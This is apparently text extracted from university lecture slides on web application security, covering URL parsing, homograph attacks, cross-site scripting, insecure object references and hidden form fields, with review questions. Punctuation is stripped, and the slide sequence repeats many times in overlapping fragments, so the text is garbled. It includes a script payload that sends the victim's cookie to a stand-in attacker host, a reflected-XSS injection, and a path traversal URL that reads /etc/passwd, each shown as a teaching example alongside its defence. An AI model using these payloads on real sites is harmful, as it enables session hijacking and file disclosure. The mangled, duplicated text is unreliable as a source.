Old flaw passing unnecessary information to client andexpecting it back unmodified
ltform action=cgi-bincgimailexe method=postgtltinput type=hidden name=$File$
value=templatesfeedbacktxtgtltinput type=hidden name=$To$
value=feedbacksomesiteexamplegtltformgt
Protecting information in server data
Sometimes the server must pass information to theclient during the interaction but must protect it
Example editing a wiki page
ltformgtltinput type=hidden name=pagename value=NineteenSixtiesToysgtlttextarea cols=80 rows=25 name=wpTextgt
ltformgt
Solution add a MAC constructed with a server-sidesecret key
ltinput type=hidden name=pagemacvalue=bc9faaae1e35d52f3dea9651da12cd36627b8403gt
Or could encrypt the pagename
Other authorization mistakes
Assuming requests occur in proper order
Eacute For an admin task (eg password reset) assumingthat user must have issued a GET to retrieve a formbefore a POSTEacute only checking authorization on first step
Authorization by obscurity
Eacute Supposing that because a web page is not linked tothe main site only people who are given it will beable to reach it
httpwwwmyservercomsecretareaprivatepaperpdf
Review questionsURLs
Eacute Recap the 8 components of a URL From a serverside point of view which of these is trustworthyFrom the web app viewpoint which of these is itmost important to validate in output to protectyour users
XSS
Eacute Explain how session stealing works with XSS Howcould a reflected XSS attack steal a session
Object references
Eacute Why is it important to add defence-in-depth whenconfiguring web servers Give three examples ofways in which a web application may be restrictedby a (separate) server
References
Some commentary and examples were taken from thetexts
Eacute Innocent Code a security wake-up call for webprogrammers by Sverre H Huseby Wiley 2004
Eacute The Tangled Web a Guide to Securing Modern WebApplications by Michal Zelewski No Starch Press2012 (Recommended)
as well as the named RFCs
- Overview
- Basics URLs
- Output Filtering and XSS
- Object references
Fragment identifier
lastsection
Eacute Interpretation depends on client resource typeEacute in practice anchor names in HTML elements
Eacute Not intended to be sent to serverEacute Recent use store client-side state while browsing
Eacute can be changed without page reloadEacute easily bookmarked sharedEacute eg map locations
Metacharacters
Eacute Some punctuation characters are not allowedEacute eg [ ] $ amp rsquo ( ) =
Eacute These are URL encoded with percent-ASCII hexEacute eg 2F encodes 25 encodes
The RFC does not specify a fixed mapping andbrowsers try to interpret as many user inputs aspossible
Eg examples like http65xample63om
Moreover RFCs are not always followed
Non-ASCII text encodings in URLsEacute Original standards did not allow for non-ASCII textEacute but clearly desirable for non-English textEacute RFC 3492 introduced Punycode to allow
behind-the-scenes DNS lookupEacute DNS lookup xn-[US-ASCII]-[Unicode]Eacute Browser display Unicode part
Extension of 38 characters to 100000 glyphs allowedmany homograph attacks
Eacute peacom has 5 identical looking Cyrillic charsEacute there are non-slash characters that look like Eacute some attacks not easily prevented by DNS
registrars
We have (puny) browser search engine defences forthis Moral probably better to stick with ASCII
Overall consequences
Parsing URLs more complicated than you imagined
Eacute better to use well-tested libraries than ad hoc code
But for output want to be very careful
Eacute especially if URLs made from user (attacker) inputEacute should canonicalize then filter reformatEacute filter especially on the scheme and authority
Overall consequences
Eyeballs can easily be fooled when looking at URLs
httpexamplecomampgibberish=1234167772161
httpexamplecomcoredumpcx
httpexamplecomcoredumpcx
Which server is visited by these URLs
Examples from The Tangled Web
Outline
Overview
Basics URLs
Output Filtering and XSS
Object references
XSS attacks in general
Eacute Attack typically on (another) user of the web appEacute Attacker tricks app into displaying malicious code
Eacute typically script code
Many possible aims
Eacute display random images popup windowsEacute change page contents eg alter bank account
numberEacute session hijacking steal session cookies
Session hijacking with XSS
[Picture from Innocent Code
Example injected script
ltscriptgtdocumentlocationreplace(httpwwwbadguyexamplestealphp+ what= + documentcookie)
ltscriptgt
Eacute redirects victimrsquos browser to attackers site passingcookie
Eacute might also pass currently visited web pageEacute then attackers server can issue a redirect back
again
Reflected XSSReflected XSS occurs when injected malicious codeisnrsquot stored in server but is immediately displayed inthe visited page Suppose
httpmymanpagesorgmanpagephptitle=Man+GCCprogram=gccgt
dynamically makes HTML embedding title directly
lth1gtMan GCClth1gt
An attacker could use this with a malicious input
title=ltscriptgtltscriptgtprogram=gcc
which eg steals a cookie
Exercise Explain how this attack works in practice
XSS SolutionsInput processing tricky need to understand data flowthrough app quoting encoding passed tofromfunctions databases etc Hence output filtering
Plain output HTML encoding
Eacute Stored data values need to be encoded to representin HTML (eg lt converted to amplt etc)
Marked up output complex filtering
Eacute Need to work through tags in input and rule outrisky ones Scripts may appear in attributes Flaky
Marked up output DSL
Eacute A better approach use a dedicated syntax convertto restricted subset of HTML
Outline
Overview
Basics URLs
Output Filtering and XSS
Object references
Embarrassing PHP blunders
httpresearchsiteedacukshowhtmlphptitle=User+Manualampfile=release2FUsermanhtmlIntroduction
A ldquocoolrdquo PHP script showhtmlphp
Eacute take a plain HTML fileEacute wrap it with navigation links site styleEacute convert the internal links to reference back to
wrapped version
Embarrassing PHP blunders
httpresearchsiteedacukshowhtmlphptitle=User+Manualampfile=2Fetc25passwd
Eacute remote users can visit any file on the systemEacute mistake motivates defence-in-depth
Eacute http server should not serve up any fileEacute use internal web server config (separate apps)Eacute and external OS config (eg nobody user chroot)
Authorization and object access
What was the problem here
Eacute the app developer (implicitly) authorized usersEacute to read documentation files he had createdEacute project was open source no need for loginsEacute app contained no paths to files outside the projectEacute so no explicit authorization code was written
Eacute but PHP code didnrsquot check the filename returnedEacute showhtmlphp provided access to server objectsEacute input validation only checked for file existence
There should have been a re-authorization stepA well-written app should only allow access to its ownresources
Looking at anyonersquos bank account
ltform action=show-accountasp method=getgtAccount to displayltselect name=accountgt
ltoption value=12345678901gt12345678901ltoptiongtltoption value=12346543210gt12346543210ltoptiongt
ltselectgtltinput type=submit name=show value=Show Accountgt
ltformgt
Example from Innocent Code based on a Norwegian newspaperstory about a ldquo17-year geek able to view anyonersquos bank accountrdquo
A genius clearly
Solutions for object referencingRe-validate
Eacute Check authorization againEacute Obvious solution but duplicates effort
Add a data indirection
Eacute Session-specific server side array of account nos
ltoption value=1gt12345678901ltoptiongtltoption value=2gt12346543210ltoptiongt
Eacute Similarly for file access
httpresearchsiteedacukshowhtmlphpfile=1Introduction
for many files a hash table or database could be used
Passing too much information
Old flaw passing unnecessary information to client andexpecting it back unmodified
ltform action=cgi-bincgimailexe method=postgtltinput type=hidden name=$File$
value=templatesfeedbacktxtgtltinput type=hidden name=$To$
value=feedbacksomesiteexamplegtltformgt
Protecting information in server data
Sometimes the server must pass information to theclient during the interaction but must protect it
Example editing a wiki page
ltformgtltinput type=hidden name=pagename value=NineteenSixtiesToysgtlttextarea cols=80 rows=25 name=wpTextgt
ltformgt
Solution add a MAC constructed with a server-sidesecret key
ltinput type=hidden name=pagemacvalue=bc9faaae1e35d52f3dea9651da12cd36627b8403gt
Or could encrypt the pagename
Other authorization mistakes
Assuming requests occur in proper order
Eacute For an admin task (eg password reset) assumingthat user must have issued a GET to retrieve a formbefore a POSTEacute only checking authorization on first step
Authorization by obscurity
Eacute Supposing that because a web page is not linked tothe main site only people who are given it will beable to reach it
httpwwwmyservercomsecretareaprivatepaperpdf
Review questionsURLs
Eacute Recap the 8 components of a URL From a serverside point of view which of these is trustworthyFrom the web app viewpoint which of these is itmost important to validate in output to protectyour users
XSS
Eacute Explain how session stealing works with XSS Howcould a reflected XSS attack steal a session
Object references
Eacute Why is it important to add defence-in-depth whenconfiguring web servers Give three examples ofways in which a web application may be restrictedby a (separate) server
References
Some commentary and examples were taken from thetexts
Eacute Innocent Code a security wake-up call for webprogrammers by Sverre H Huseby Wiley 2004
Eacute The Tangled Web a Guide to Securing Modern WebApplications by Michal Zelewski No Starch Press2012 (Recommended)
as well as the named RFCs
- Overview
- Basics URLs
- Output Filtering and XSS
- Object references
Metacharacters
Eacute Some punctuation characters are not allowedEacute eg [ ] $ amp rsquo ( ) =
Eacute These are URL encoded with percent-ASCII hexEacute eg 2F encodes 25 encodes
The RFC does not specify a fixed mapping andbrowsers try to interpret as many user inputs aspossible
Eg examples like http65xample63om
Moreover RFCs are not always followed
Non-ASCII text encodings in URLsEacute Original standards did not allow for non-ASCII textEacute but clearly desirable for non-English textEacute RFC 3492 introduced Punycode to allow
behind-the-scenes DNS lookupEacute DNS lookup xn-[US-ASCII]-[Unicode]Eacute Browser display Unicode part
Extension of 38 characters to 100000 glyphs allowedmany homograph attacks
Eacute peacom has 5 identical looking Cyrillic charsEacute there are non-slash characters that look like Eacute some attacks not easily prevented by DNS
registrars
We have (puny) browser search engine defences forthis Moral probably better to stick with ASCII
Overall consequences
Parsing URLs more complicated than you imagined
Eacute better to use well-tested libraries than ad hoc code
But for output want to be very careful
Eacute especially if URLs made from user (attacker) inputEacute should canonicalize then filter reformatEacute filter especially on the scheme and authority
Overall consequences
Eyeballs can easily be fooled when looking at URLs
httpexamplecomampgibberish=1234167772161
httpexamplecomcoredumpcx
httpexamplecomcoredumpcx
Which server is visited by these URLs
Examples from The Tangled Web
Outline
Overview
Basics URLs
Output Filtering and XSS
Object references
XSS attacks in general
Eacute Attack typically on (another) user of the web appEacute Attacker tricks app into displaying malicious code
Eacute typically script code
Many possible aims
Eacute display random images popup windowsEacute change page contents eg alter bank account
numberEacute session hijacking steal session cookies
Session hijacking with XSS
[Picture from Innocent Code
Example injected script
ltscriptgtdocumentlocationreplace(httpwwwbadguyexamplestealphp+ what= + documentcookie)
ltscriptgt
Eacute redirects victimrsquos browser to attackers site passingcookie
Eacute might also pass currently visited web pageEacute then attackers server can issue a redirect back
again
Reflected XSSReflected XSS occurs when injected malicious codeisnrsquot stored in server but is immediately displayed inthe visited page Suppose
httpmymanpagesorgmanpagephptitle=Man+GCCprogram=gccgt
dynamically makes HTML embedding title directly
lth1gtMan GCClth1gt
An attacker could use this with a malicious input
title=ltscriptgtltscriptgtprogram=gcc
which eg steals a cookie
Exercise Explain how this attack works in practice
XSS SolutionsInput processing tricky need to understand data flowthrough app quoting encoding passed tofromfunctions databases etc Hence output filtering
Plain output HTML encoding
Eacute Stored data values need to be encoded to representin HTML (eg lt converted to amplt etc)
Marked up output complex filtering
Eacute Need to work through tags in input and rule outrisky ones Scripts may appear in attributes Flaky
Marked up output DSL
Eacute A better approach use a dedicated syntax convertto restricted subset of HTML
Outline
Overview
Basics URLs
Output Filtering and XSS
Object references
Embarrassing PHP blunders
httpresearchsiteedacukshowhtmlphptitle=User+Manualampfile=release2FUsermanhtmlIntroduction
A ldquocoolrdquo PHP script showhtmlphp
Eacute take a plain HTML fileEacute wrap it with navigation links site styleEacute convert the internal links to reference back to
wrapped version
Embarrassing PHP blunders
httpresearchsiteedacukshowhtmlphptitle=User+Manualampfile=2Fetc25passwd
Eacute remote users can visit any file on the systemEacute mistake motivates defence-in-depth
Eacute http server should not serve up any fileEacute use internal web server config (separate apps)Eacute and external OS config (eg nobody user chroot)
Authorization and object access
What was the problem here
Eacute the app developer (implicitly) authorized usersEacute to read documentation files he had createdEacute project was open source no need for loginsEacute app contained no paths to files outside the projectEacute so no explicit authorization code was written
Eacute but PHP code didnrsquot check the filename returnedEacute showhtmlphp provided access to server objectsEacute input validation only checked for file existence
There should have been a re-authorization stepA well-written app should only allow access to its ownresources
Looking at anyonersquos bank account
ltform action=show-accountasp method=getgtAccount to displayltselect name=accountgt
ltoption value=12345678901gt12345678901ltoptiongtltoption value=12346543210gt12346543210ltoptiongt
ltselectgtltinput type=submit name=show value=Show Accountgt
ltformgt
Example from Innocent Code based on a Norwegian newspaperstory about a ldquo17-year geek able to view anyonersquos bank accountrdquo
A genius clearly
Solutions for object referencingRe-validate
Eacute Check authorization againEacute Obvious solution but duplicates effort
Add a data indirection
Eacute Session-specific server side array of account nos
ltoption value=1gt12345678901ltoptiongtltoption value=2gt12346543210ltoptiongt
Eacute Similarly for file access
httpresearchsiteedacukshowhtmlphpfile=1Introduction
for many files a hash table or database could be used
Passing too much information
Old flaw passing unnecessary information to client andexpecting it back unmodified
ltform action=cgi-bincgimailexe method=postgtltinput type=hidden name=$File$
value=templatesfeedbacktxtgtltinput type=hidden name=$To$
value=feedbacksomesiteexamplegtltformgt
Protecting information in server data
Sometimes the server must pass information to theclient during the interaction but must protect it
Example editing a wiki page
ltformgtltinput type=hidden name=pagename value=NineteenSixtiesToysgtlttextarea cols=80 rows=25 name=wpTextgt
ltformgt
Solution add a MAC constructed with a server-sidesecret key
ltinput type=hidden name=pagemacvalue=bc9faaae1e35d52f3dea9651da12cd36627b8403gt
Or could encrypt the pagename
Other authorization mistakes
Assuming requests occur in proper order
Eacute For an admin task (eg password reset) assumingthat user must have issued a GET to retrieve a formbefore a POSTEacute only checking authorization on first step
Authorization by obscurity
Eacute Supposing that because a web page is not linked tothe main site only people who are given it will beable to reach it
httpwwwmyservercomsecretareaprivatepaperpdf
Review questionsURLs
Eacute Recap the 8 components of a URL From a serverside point of view which of these is trustworthyFrom the web app viewpoint which of these is itmost important to validate in output to protectyour users
XSS
Eacute Explain how session stealing works with XSS Howcould a reflected XSS attack steal a session
Object references
Eacute Why is it important to add defence-in-depth whenconfiguring web servers Give three examples ofways in which a web application may be restrictedby a (separate) server
References
Some commentary and examples were taken from thetexts
Eacute Innocent Code a security wake-up call for webprogrammers by Sverre H Huseby Wiley 2004
Eacute The Tangled Web a Guide to Securing Modern WebApplications by Michal Zelewski No Starch Press2012 (Recommended)
as well as the named RFCs
- Overview
- Basics URLs
- Output Filtering and XSS
- Object references
Non-ASCII text encodings in URLsEacute Original standards did not allow for non-ASCII textEacute but clearly desirable for non-English textEacute RFC 3492 introduced Punycode to allow
behind-the-scenes DNS lookupEacute DNS lookup xn-[US-ASCII]-[Unicode]Eacute Browser display Unicode part
Extension of 38 characters to 100000 glyphs allowedmany homograph attacks
Eacute peacom has 5 identical looking Cyrillic charsEacute there are non-slash characters that look like Eacute some attacks not easily prevented by DNS
registrars
We have (puny) browser search engine defences forthis Moral probably better to stick with ASCII
Overall consequences
Parsing URLs more complicated than you imagined
Eacute better to use well-tested libraries than ad hoc code
But for output want to be very careful
Eacute especially if URLs made from user (attacker) inputEacute should canonicalize then filter reformatEacute filter especially on the scheme and authority
Overall consequences
Eyeballs can easily be fooled when looking at URLs
httpexamplecomampgibberish=1234167772161
httpexamplecomcoredumpcx
httpexamplecomcoredumpcx
Which server is visited by these URLs
Examples from The Tangled Web
Outline
Overview
Basics URLs
Output Filtering and XSS
Object references
XSS attacks in general
Eacute Attack typically on (another) user of the web appEacute Attacker tricks app into displaying malicious code
Eacute typically script code
Many possible aims
Eacute display random images popup windowsEacute change page contents eg alter bank account
numberEacute session hijacking steal session cookies
Session hijacking with XSS
[Picture from Innocent Code
Example injected script
ltscriptgtdocumentlocationreplace(httpwwwbadguyexamplestealphp+ what= + documentcookie)
ltscriptgt
Eacute redirects victimrsquos browser to attackers site passingcookie
Eacute might also pass currently visited web pageEacute then attackers server can issue a redirect back
again
Reflected XSSReflected XSS occurs when injected malicious codeisnrsquot stored in server but is immediately displayed inthe visited page Suppose
httpmymanpagesorgmanpagephptitle=Man+GCCprogram=gccgt
dynamically makes HTML embedding title directly
lth1gtMan GCClth1gt
An attacker could use this with a malicious input
title=ltscriptgtltscriptgtprogram=gcc
which eg steals a cookie
Exercise Explain how this attack works in practice
XSS SolutionsInput processing tricky need to understand data flowthrough app quoting encoding passed tofromfunctions databases etc Hence output filtering
Plain output HTML encoding
Eacute Stored data values need to be encoded to representin HTML (eg lt converted to amplt etc)
Marked up output complex filtering
Eacute Need to work through tags in input and rule outrisky ones Scripts may appear in attributes Flaky
Marked up output DSL
Eacute A better approach use a dedicated syntax convertto restricted subset of HTML
Outline
Overview
Basics URLs
Output Filtering and XSS
Object references
Embarrassing PHP blunders
httpresearchsiteedacukshowhtmlphptitle=User+Manualampfile=release2FUsermanhtmlIntroduction
A ldquocoolrdquo PHP script showhtmlphp
Eacute take a plain HTML fileEacute wrap it with navigation links site styleEacute convert the internal links to reference back to
wrapped version
Embarrassing PHP blunders
httpresearchsiteedacukshowhtmlphptitle=User+Manualampfile=2Fetc25passwd
Eacute remote users can visit any file on the systemEacute mistake motivates defence-in-depth
Eacute http server should not serve up any fileEacute use internal web server config (separate apps)Eacute and external OS config (eg nobody user chroot)
Authorization and object access
What was the problem here
Eacute the app developer (implicitly) authorized usersEacute to read documentation files he had createdEacute project was open source no need for loginsEacute app contained no paths to files outside the projectEacute so no explicit authorization code was written
Eacute but PHP code didnrsquot check the filename returnedEacute showhtmlphp provided access to server objectsEacute input validation only checked for file existence
There should have been a re-authorization stepA well-written app should only allow access to its ownresources
Looking at anyonersquos bank account
ltform action=show-accountasp method=getgtAccount to displayltselect name=accountgt
ltoption value=12345678901gt12345678901ltoptiongtltoption value=12346543210gt12346543210ltoptiongt
ltselectgtltinput type=submit name=show value=Show Accountgt
ltformgt
Example from Innocent Code based on a Norwegian newspaperstory about a ldquo17-year geek able to view anyonersquos bank accountrdquo
A genius clearly
Solutions for object referencingRe-validate
Eacute Check authorization againEacute Obvious solution but duplicates effort
Add a data indirection
Eacute Session-specific server side array of account nos
ltoption value=1gt12345678901ltoptiongtltoption value=2gt12346543210ltoptiongt
Eacute Similarly for file access
httpresearchsiteedacukshowhtmlphpfile=1Introduction
for many files a hash table or database could be used
Passing too much information
Old flaw passing unnecessary information to client andexpecting it back unmodified
ltform action=cgi-bincgimailexe method=postgtltinput type=hidden name=$File$
value=templatesfeedbacktxtgtltinput type=hidden name=$To$
value=feedbacksomesiteexamplegtltformgt
Protecting information in server data
Sometimes the server must pass information to theclient during the interaction but must protect it
Example editing a wiki page
ltformgtltinput type=hidden name=pagename value=NineteenSixtiesToysgtlttextarea cols=80 rows=25 name=wpTextgt
ltformgt
Solution add a MAC constructed with a server-sidesecret key
ltinput type=hidden name=pagemacvalue=bc9faaae1e35d52f3dea9651da12cd36627b8403gt
Or could encrypt the pagename
Other authorization mistakes
Assuming requests occur in proper order
Eacute For an admin task (eg password reset) assumingthat user must have issued a GET to retrieve a formbefore a POSTEacute only checking authorization on first step
Authorization by obscurity
Eacute Supposing that because a web page is not linked tothe main site only people who are given it will beable to reach it
httpwwwmyservercomsecretareaprivatepaperpdf
Review questionsURLs
Eacute Recap the 8 components of a URL From a serverside point of view which of these is trustworthyFrom the web app viewpoint which of these is itmost important to validate in output to protectyour users
XSS
Eacute Explain how session stealing works with XSS Howcould a reflected XSS attack steal a session
Object references
Eacute Why is it important to add defence-in-depth whenconfiguring web servers Give three examples ofways in which a web application may be restrictedby a (separate) server
References
Some commentary and examples were taken from thetexts
Eacute Innocent Code a security wake-up call for webprogrammers by Sverre H Huseby Wiley 2004
Eacute The Tangled Web a Guide to Securing Modern WebApplications by Michal Zelewski No Starch Press2012 (Recommended)
as well as the named RFCs
- Overview
- Basics URLs
- Output Filtering and XSS
- Object references
Overall consequences
Parsing URLs more complicated than you imagined
Eacute better to use well-tested libraries than ad hoc code
But for output want to be very careful
Eacute especially if URLs made from user (attacker) inputEacute should canonicalize then filter reformatEacute filter especially on the scheme and authority
Overall consequences
Eyeballs can easily be fooled when looking at URLs
httpexamplecomampgibberish=1234167772161
httpexamplecomcoredumpcx
httpexamplecomcoredumpcx
Which server is visited by these URLs
Examples from The Tangled Web
Outline
Overview
Basics URLs
Output Filtering and XSS
Object references
XSS attacks in general
Eacute Attack typically on (another) user of the web appEacute Attacker tricks app into displaying malicious code
Eacute typically script code
Many possible aims
Eacute display random images popup windowsEacute change page contents eg alter bank account
numberEacute session hijacking steal session cookies
Session hijacking with XSS
[Picture from Innocent Code
Example injected script
ltscriptgtdocumentlocationreplace(httpwwwbadguyexamplestealphp+ what= + documentcookie)
ltscriptgt
Eacute redirects victimrsquos browser to attackers site passingcookie
Eacute might also pass currently visited web pageEacute then attackers server can issue a redirect back
again
Reflected XSSReflected XSS occurs when injected malicious codeisnrsquot stored in server but is immediately displayed inthe visited page Suppose
httpmymanpagesorgmanpagephptitle=Man+GCCprogram=gccgt
dynamically makes HTML embedding title directly
lth1gtMan GCClth1gt
An attacker could use this with a malicious input
title=ltscriptgtltscriptgtprogram=gcc
which eg steals a cookie
Exercise Explain how this attack works in practice
XSS SolutionsInput processing tricky need to understand data flowthrough app quoting encoding passed tofromfunctions databases etc Hence output filtering
Plain output HTML encoding
Eacute Stored data values need to be encoded to representin HTML (eg lt converted to amplt etc)
Marked up output complex filtering
Eacute Need to work through tags in input and rule outrisky ones Scripts may appear in attributes Flaky
Marked up output DSL
Eacute A better approach use a dedicated syntax convertto restricted subset of HTML
Outline
Overview
Basics URLs
Output Filtering and XSS
Object references
Embarrassing PHP blunders
httpresearchsiteedacukshowhtmlphptitle=User+Manualampfile=release2FUsermanhtmlIntroduction
A ldquocoolrdquo PHP script showhtmlphp
Eacute take a plain HTML fileEacute wrap it with navigation links site styleEacute convert the internal links to reference back to
wrapped version
Embarrassing PHP blunders
httpresearchsiteedacukshowhtmlphptitle=User+Manualampfile=2Fetc25passwd
Eacute remote users can visit any file on the systemEacute mistake motivates defence-in-depth
Eacute http server should not serve up any fileEacute use internal web server config (separate apps)Eacute and external OS config (eg nobody user chroot)
Authorization and object access
What was the problem here
Eacute the app developer (implicitly) authorized usersEacute to read documentation files he had createdEacute project was open source no need for loginsEacute app contained no paths to files outside the projectEacute so no explicit authorization code was written
Eacute but PHP code didnrsquot check the filename returnedEacute showhtmlphp provided access to server objectsEacute input validation only checked for file existence
There should have been a re-authorization stepA well-written app should only allow access to its ownresources
Looking at anyonersquos bank account
ltform action=show-accountasp method=getgtAccount to displayltselect name=accountgt
ltoption value=12345678901gt12345678901ltoptiongtltoption value=12346543210gt12346543210ltoptiongt
ltselectgtltinput type=submit name=show value=Show Accountgt
ltformgt
Example from Innocent Code based on a Norwegian newspaperstory about a ldquo17-year geek able to view anyonersquos bank accountrdquo
A genius clearly
Solutions for object referencingRe-validate
Eacute Check authorization againEacute Obvious solution but duplicates effort
Add a data indirection
Eacute Session-specific server side array of account nos
ltoption value=1gt12345678901ltoptiongtltoption value=2gt12346543210ltoptiongt
Eacute Similarly for file access
httpresearchsiteedacukshowhtmlphpfile=1Introduction
for many files a hash table or database could be used
Passing too much information
Old flaw passing unnecessary information to client andexpecting it back unmodified
ltform action=cgi-bincgimailexe method=postgtltinput type=hidden name=$File$
value=templatesfeedbacktxtgtltinput type=hidden name=$To$
value=feedbacksomesiteexamplegtltformgt
Protecting information in server data
Sometimes the server must pass information to theclient during the interaction but must protect it
Example editing a wiki page
ltformgtltinput type=hidden name=pagename value=NineteenSixtiesToysgtlttextarea cols=80 rows=25 name=wpTextgt
ltformgt
Solution add a MAC constructed with a server-sidesecret key
ltinput type=hidden name=pagemacvalue=bc9faaae1e35d52f3dea9651da12cd36627b8403gt
Or could encrypt the pagename
Other authorization mistakes
Assuming requests occur in proper order
Eacute For an admin task (eg password reset) assumingthat user must have issued a GET to retrieve a formbefore a POSTEacute only checking authorization on first step
Authorization by obscurity
Eacute Supposing that because a web page is not linked tothe main site only people who are given it will beable to reach it
httpwwwmyservercomsecretareaprivatepaperpdf
Review questionsURLs
Eacute Recap the 8 components of a URL From a serverside point of view which of these is trustworthyFrom the web app viewpoint which of these is itmost important to validate in output to protectyour users
XSS
Eacute Explain how session stealing works with XSS Howcould a reflected XSS attack steal a session
Object references
Eacute Why is it important to add defence-in-depth whenconfiguring web servers Give three examples ofways in which a web application may be restrictedby a (separate) server
References
Some commentary and examples were taken from thetexts
Eacute Innocent Code a security wake-up call for webprogrammers by Sverre H Huseby Wiley 2004
Eacute The Tangled Web a Guide to Securing Modern WebApplications by Michal Zelewski No Starch Press2012 (Recommended)
as well as the named RFCs
- Overview
- Basics URLs
- Output Filtering and XSS
- Object references
Overall consequences
Eyeballs can easily be fooled when looking at URLs
httpexamplecomampgibberish=1234167772161
httpexamplecomcoredumpcx
httpexamplecomcoredumpcx
Which server is visited by these URLs
Examples from The Tangled Web
Outline
Overview
Basics URLs
Output Filtering and XSS
Object references
XSS attacks in general
Eacute Attack typically on (another) user of the web appEacute Attacker tricks app into displaying malicious code
Eacute typically script code
Many possible aims
Eacute display random images popup windowsEacute change page contents eg alter bank account
numberEacute session hijacking steal session cookies
Session hijacking with XSS
[Picture from Innocent Code
Example injected script
ltscriptgtdocumentlocationreplace(httpwwwbadguyexamplestealphp+ what= + documentcookie)
ltscriptgt
Eacute redirects victimrsquos browser to attackers site passingcookie
Eacute might also pass currently visited web pageEacute then attackers server can issue a redirect back
again
Reflected XSSReflected XSS occurs when injected malicious codeisnrsquot stored in server but is immediately displayed inthe visited page Suppose
httpmymanpagesorgmanpagephptitle=Man+GCCprogram=gccgt
dynamically makes HTML embedding title directly
lth1gtMan GCClth1gt
An attacker could use this with a malicious input
title=ltscriptgtltscriptgtprogram=gcc
which eg steals a cookie
Exercise Explain how this attack works in practice
XSS SolutionsInput processing tricky need to understand data flowthrough app quoting encoding passed tofromfunctions databases etc Hence output filtering
Plain output HTML encoding
Eacute Stored data values need to be encoded to representin HTML (eg lt converted to amplt etc)
Marked up output complex filtering
Eacute Need to work through tags in input and rule outrisky ones Scripts may appear in attributes Flaky
Marked up output DSL
Eacute A better approach use a dedicated syntax convertto restricted subset of HTML
Outline
Overview
Basics URLs
Output Filtering and XSS
Object references
Embarrassing PHP blunders
httpresearchsiteedacukshowhtmlphptitle=User+Manualampfile=release2FUsermanhtmlIntroduction
A ldquocoolrdquo PHP script showhtmlphp
Eacute take a plain HTML fileEacute wrap it with navigation links site styleEacute convert the internal links to reference back to
wrapped version
Embarrassing PHP blunders
httpresearchsiteedacukshowhtmlphptitle=User+Manualampfile=2Fetc25passwd
Eacute remote users can visit any file on the systemEacute mistake motivates defence-in-depth
Eacute http server should not serve up any fileEacute use internal web server config (separate apps)Eacute and external OS config (eg nobody user chroot)
Authorization and object access
What was the problem here
Eacute the app developer (implicitly) authorized usersEacute to read documentation files he had createdEacute project was open source no need for loginsEacute app contained no paths to files outside the projectEacute so no explicit authorization code was written
Eacute but PHP code didnrsquot check the filename returnedEacute showhtmlphp provided access to server objectsEacute input validation only checked for file existence
There should have been a re-authorization stepA well-written app should only allow access to its ownresources
Looking at anyonersquos bank account
ltform action=show-accountasp method=getgtAccount to displayltselect name=accountgt
ltoption value=12345678901gt12345678901ltoptiongtltoption value=12346543210gt12346543210ltoptiongt
ltselectgtltinput type=submit name=show value=Show Accountgt
ltformgt
Example from Innocent Code based on a Norwegian newspaperstory about a ldquo17-year geek able to view anyonersquos bank accountrdquo
A genius clearly
Solutions for object referencingRe-validate
Eacute Check authorization againEacute Obvious solution but duplicates effort
Add a data indirection
Eacute Session-specific server side array of account nos
ltoption value=1gt12345678901ltoptiongtltoption value=2gt12346543210ltoptiongt
Eacute Similarly for file access
httpresearchsiteedacukshowhtmlphpfile=1Introduction
for many files a hash table or database could be used
Passing too much information
Old flaw passing unnecessary information to client andexpecting it back unmodified
ltform action=cgi-bincgimailexe method=postgtltinput type=hidden name=$File$
value=templatesfeedbacktxtgtltinput type=hidden name=$To$
value=feedbacksomesiteexamplegtltformgt
Protecting information in server data
Sometimes the server must pass information to theclient during the interaction but must protect it
Example editing a wiki page
ltformgtltinput type=hidden name=pagename value=NineteenSixtiesToysgtlttextarea cols=80 rows=25 name=wpTextgt
ltformgt
Solution add a MAC constructed with a server-sidesecret key
ltinput type=hidden name=pagemacvalue=bc9faaae1e35d52f3dea9651da12cd36627b8403gt
Or could encrypt the pagename
Other authorization mistakes
Assuming requests occur in proper order
Eacute For an admin task (eg password reset) assumingthat user must have issued a GET to retrieve a formbefore a POSTEacute only checking authorization on first step
Authorization by obscurity
Eacute Supposing that because a web page is not linked tothe main site only people who are given it will beable to reach it
httpwwwmyservercomsecretareaprivatepaperpdf
Review questionsURLs
Eacute Recap the 8 components of a URL From a serverside point of view which of these is trustworthyFrom the web app viewpoint which of these is itmost important to validate in output to protectyour users
XSS
Eacute Explain how session stealing works with XSS Howcould a reflected XSS attack steal a session
Object references
Eacute Why is it important to add defence-in-depth whenconfiguring web servers Give three examples ofways in which a web application may be restrictedby a (separate) server
References
Some commentary and examples were taken from thetexts
Eacute Innocent Code a security wake-up call for webprogrammers by Sverre H Huseby Wiley 2004
Eacute The Tangled Web a Guide to Securing Modern WebApplications by Michal Zelewski No Starch Press2012 (Recommended)
as well as the named RFCs
- Overview
- Basics URLs
- Output Filtering and XSS
- Object references
Outline
Overview
Basics URLs
Output Filtering and XSS
Object references
XSS attacks in general
Eacute Attack typically on (another) user of the web appEacute Attacker tricks app into displaying malicious code
Eacute typically script code
Many possible aims
Eacute display random images popup windowsEacute change page contents eg alter bank account
numberEacute session hijacking steal session cookies
Session hijacking with XSS
[Picture from Innocent Code
Example injected script
ltscriptgtdocumentlocationreplace(httpwwwbadguyexamplestealphp+ what= + documentcookie)
ltscriptgt
Eacute redirects victimrsquos browser to attackers site passingcookie
Eacute might also pass currently visited web pageEacute then attackers server can issue a redirect back
again
Reflected XSSReflected XSS occurs when injected malicious codeisnrsquot stored in server but is immediately displayed inthe visited page Suppose
httpmymanpagesorgmanpagephptitle=Man+GCCprogram=gccgt
dynamically makes HTML embedding title directly
lth1gtMan GCClth1gt
An attacker could use this with a malicious input
title=ltscriptgtltscriptgtprogram=gcc
which eg steals a cookie
Exercise Explain how this attack works in practice
XSS SolutionsInput processing tricky need to understand data flowthrough app quoting encoding passed tofromfunctions databases etc Hence output filtering
Plain output HTML encoding
Eacute Stored data values need to be encoded to representin HTML (eg lt converted to amplt etc)
Marked up output complex filtering
Eacute Need to work through tags in input and rule outrisky ones Scripts may appear in attributes Flaky
Marked up output DSL
Eacute A better approach use a dedicated syntax convertto restricted subset of HTML
Outline
Overview
Basics URLs
Output Filtering and XSS
Object references
Embarrassing PHP blunders
httpresearchsiteedacukshowhtmlphptitle=User+Manualampfile=release2FUsermanhtmlIntroduction
A ldquocoolrdquo PHP script showhtmlphp
Eacute take a plain HTML fileEacute wrap it with navigation links site styleEacute convert the internal links to reference back to
wrapped version
Embarrassing PHP blunders
httpresearchsiteedacukshowhtmlphptitle=User+Manualampfile=2Fetc25passwd
